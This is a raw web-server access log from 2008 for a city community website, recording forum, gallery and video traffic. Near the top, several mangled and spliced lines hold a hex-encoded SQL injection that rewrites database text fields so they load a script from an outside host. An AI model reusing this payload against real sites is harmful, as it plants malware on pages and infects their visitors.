200.63.42.93 - - [28/Aug/2008:06:03:35 -0700] "GET /jodera2/viewforum.php?f=1&sid=c89c14a3c3b26d95eceba152e56725df HTTP/1.0" 200 83723 "http://www.sancarloscity.org/viewforum.php?f=1&sid=c89c14a3c3b26d95eceba152e56725df" "Opera/8.00 (Windows NT 5.1; U; en)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:03:48 -0700] "GET /jodera2/profile.php?mode=register HTTP/1.0" 200 14310 "http://www.sancarloscity.org/profile.php?mode=register" "Opera/8.00 (Windows NT 5.1; U; en)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:03:49 -0700] "GET /jodera2/profile.php?mode=register&agreed=true HTTP/1.0" 200 30036 "http://www.sancarloscity.org/profile.php?mode=register&agreed=true" "Opera/8.00 (Windows NT 5.1; U; en)" "www.sancarloscity.org"
200.63.42.93 - - [28/Aug/2008:06:03:54 -0700] "POST /jodera2/profile.php HTTP/1.0" 200 32174 "http://www.sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Opera/8.00 (Windows NT 5.1; U; en)" "www.sancarloscity.org"
61.139.66.75 - - [28/Aug/2008:06:03:59 -0700] "GET /logs/access_080401.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D207768sdpanek/us1:99.171.160.961.139.66.75 - - [28/Aug/2008:06:03:59 -0700] "GET /logs/access_080401.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077686robjohnston03@sbcglobal.82.99.30.56 - - [28/Aug/2008:06:04:13 -0700] "GET /jodera2/viewforum.php?f=7&sid=93b8ced938806c60b4d63cbdf7f722cb HTTP/1.0" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:04:21 -0700] "GET /sampo/flv/080802/7.flv HTTP/1.0" 200 3819549 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
87.118.120.43 - - [28/Aug/2008:06:04:33 -0700] "GET /jodera2/profile.php?mode=register&agreed=true HTTP/1.0" 200 30952 "http://www.sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
87.118.120.43 - - [28/Aug/2008:06:04:35 -0700] "POST /jodera2/profile.php?sid=3ddabd88f5c5e25ae48ef6f9f56fdeaa HTTP/1.0" 200 11457 "http://www.sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
87.118.120.43 - - [28/Aug/2008:06:04:36 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
87.118.120.43 - - [28/Aug/2008:06:04:37 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
87.118.120.43 - - [28/Aug/2008:06:04:38 -0700] "GET /jodera2/index.php?sid=3ddabd88f5c5e25ae48ef6f9f56fdeaa HTTP/1.0" 200 55015 "http://www.sancarloscity.org/jodera2/index.php?sid=3ddabd88f5c5e25ae48ef6f9f56fdeaa" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
87.118.120.43 - - [28/Aug/2008:06:04:39 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83609 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:05:24 -0700] "GET /classifieds/index.php?method=showhtmllist&list=advertisement_active&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=155&clearoff=1 HTTP/1.0" 200 89977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:05:29 -0700] "GET /sampo/flv/080802/8.flv HTTP/1.0" 200 6094848 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:05:46 -0700] "GET /classifieds/index.php?method=showhtmllist&list=classifiedscategory&rollid=114&fromfromlist=classifiedscategory&fromfrommethod=showhtmllist&fromfromid=22&clearoff=1 HTTP/1.0" 200 5991 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
82.99.30.49 - - [28/Aug/2008:06:05:49 -0700] "GET /jodera2/viewforum.php?f=11&sid=669e5cdecae510d4a342434a88acaa0e HTTP/1.0" 200 21697 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:06:06:33 -0700] "GET /forum2/index.php?showtopic=228&pid=1536&mode=threaded&start= HTTP/1.1" 200 7196 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:06:55 -0700] "GET /forum2/index.php?act=Search HTTP/1.0" 200 2999 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:02 -0700] "POST /forum2/index.php? HTTP/1.1" 302 5 "http://www.sancarloscity.org/forum2/index.php?act=Post&CODE=02&f=9&t=233&qpid=1593" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:04 -0700] "GET /forum2/index.php?showtopic=233&st=0&gopid=1594& HTTP/1.1" 200 8890 "http://www.sancarloscity.org/forum2/index.php?act=Post&CODE=02&f=9&t=233&qpid=1593" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:04 -0700] "GET /forum2/style_images/red_crysta/post_snapback.gif HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?showtopic=233&st=0&gopid=1594&#entry1594" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:05 -0700] "GET /forum2/style_images/red_crysta/css_img_quote.gif HTTP/1.1" 200 406 "http://www.sancarloscity.org/forum2/index.php?showtopic=233&st=0&gopid=1594&#entry1594" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:06 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?showtopic=233&st=0&gopid=1594&#entry1594" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
61.135.168.39 - - [28/Aug/2008:06:07:34 -0700] "GET / HTTP/1.1" 200 55575 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:34 -0700] "GET /forum2/index.php?showuser=4 HTTP/1.1" 200 5864 "http://www.sancarloscity.org/forum2/index.php?showtopic=233&st=0&gopid=1594&#entry1594" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:36 -0700] "GET /forum2/index.php?s=&act=profile&CODE=personal_ajax_load_tab&member_id=4&tab=topics&md5check=126fac8fdedb880b6c03a5361a3799be&__=1219983102718 HTTP/1.1" 200 4237 "http://www.sancarloscity.org/forum2/index.php?showuser=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:07:36 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?showuser=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:08:15 -0700] "GET /forum2/index.php?showuser=405 HTTP/1.1" 200 6738 "http://www.sancarloscity.org/forum2/index.php?showuser=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:08:18 -0700] "GET /forum2/index.php?s=&act=profile&CODE=personal_ajax_load_tab&member_id=405&tab=topics&md5check=126fac8fdedb880b6c03a5361a3799be&__=1219983143968 HTTP/1.1" 200 1990 "http://www.sancarloscity.org/forum2/index.php?showuser=405" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:08:18 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?showuser=405" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:08:20 -0700] "GET /sampo/flv/073008/1.flv HTTP/1.0" 200 21788510 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:27 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61576 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:39 -0700] "GET /jodera2/viewforum.php?f=1&sid=0e2abbc98a9d39e53530d856cb2b9e4d HTTP/1.0" 200 83723 "http://www.sancarloscity.org/viewforum.php?f=1&sid=0e2abbc98a9d39e53530d856cb2b9e4d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:48 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:08:49 -0700] "GET /forum2/index.php?showuser=94 HTTP/1.0" 200 5032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:52 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:52 -0700] "GET /jodera2/index.php?sid=0e2abbc98a9d39e53530d856cb2b9e4d HTTP/1.0" 200 55003 "http://www.sancarloscity.org/jodera2/index.php?sid=0e2abbc98a9d39e53530d856cb2b9e4d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:55 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83769 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:08:57 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:09:07 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:18 -0700] "GET /forum2/index.php?act=UserCP&CODE=00 HTTP/1.1" 200 5329 "http://www.sancarloscity.org/forum2/index.php?showuser=405" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:19 -0700] "GET /forum2/jscripts/ipb_pm.js HTTP/1.1" 200 1520 "http://www.sancarloscity.org/forum2/index.php?act=UserCP&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:20 -0700] "GET /forum2/jscripts/ipb_usercp.js HTTP/1.1" 200 2675 "http://www.sancarloscity.org/forum2/index.php?act=UserCP&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:21 -0700] "GET /forum2/style_images/red_crysta/nav_m_dark.gif HTTP/1.1" 200 53 "http://www.sancarloscity.org/forum2/index.php?act=UserCP&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:21 -0700] "GET /forum2/style_images/red_crysta/msg_folder.gif HTTP/1.1" 200 173 "http://www.sancarloscity.org/forum2/index.php?act=UserCP&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:22 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?act=UserCP&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:09:26 -0700] "GET /picgallery/displayimage.php?album=toprated&cat=4&pos=2 HTTP/1.0" 200 13284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
66.249.67.220 - - [28/Aug/2008:06:09:33 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:09:37 -0700] "GET /picgallery/thumbnails.php?album=28&page=1&sort=na HTTP/1.0" 200 9734 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:45 -0700] "GET /forum2/index.php?act=Login&CODE=03&k=126fac8fdedb880b6c03a5361a3799be HTTP/1.1" 200 767 "http://www.sancarloscity.org/forum2/index.php?act=UserCP&CODE=00" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:49 -0700] "GET /forum2/index.php? HTTP/1.1" 200 5778 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:49 -0700] "GET /forum2/style_images/css_2.css HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:50 -0700] "GET /forum2/jscripts/ips_ipsclass.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
82.99.30.40 - - [28/Aug/2008:06:09:50 -0700] "GET /jodera2/search.php?sid=ccf57776230d00c79ad13f631a3a33b2 HTTP/1.0" 200 24425 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:50 -0700] "GET /forum2/jscripts/ipb_global.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:51 -0700] "GET /forum2/jscripts/ips_menu.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:09:51 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=9&t=196&qpid=1587 HTTP/1.0" 200 2905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:51 -0700] "GET /forum2/style_images/red_crysta/folder_js_skin/ips_menu_html.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:52 -0700] "GET /forum2/cache/lang_cache/en/lang_javascript.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:53 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:53 -0700] "GET /forum2/style_images/red_crysta/login-button.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:53 -0700] "GET /forum2/style_images/red_crysta/tile_back.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:53 -0700] "GET /forum2/style_images/red_crysta/tile_sub.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:54 -0700] "GET /forum2/style_images/red_crysta/tile_sub-lite.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:54 -0700] "GET /forum2/jscripts/ips_xmlhttprequest.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:55 -0700] "GET /forum2/jscripts/ipb_global_xmlenhanced.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:55 -0700] "GET /forum2/jscripts/dom-drag.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:56 -0700] "GET /forum2/style_images/red_crysta/close.png HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:56 -0700] "GET /forum2/style_images/red_crysta/loading_anim.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:57 -0700] "GET /forum2/style_images/red_crysta/nav.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:57 -0700] "GET /forum2/style_images/red_crysta/css_pp_header.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:57 -0700] "GET /forum2/jscripts/ipb_forum.js HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:57 -0700] "GET /forum2/style_images/red_crysta/tile_cat.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:58 -0700] "GET /forum2/style_images/red_crysta/exp_plus.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:58 -0700] "GET /forum2/style_images/red_crysta/nav_m.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:58 -0700] "GET /forum2/style_images/red_crysta/iframe.html HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:58 -0700] "GET /forum2/style_images/red_crysta/exp_minus.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
121.1.55.18 - - [28/Aug/2008:06:09:59 -0700] "GET /forum2/style_images/red_crysta/bf_nonew.gif HTTP/1.1" 304 - "http://www.sancarloscity.org/forum2/index.php?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "www.sancarloscity.org"
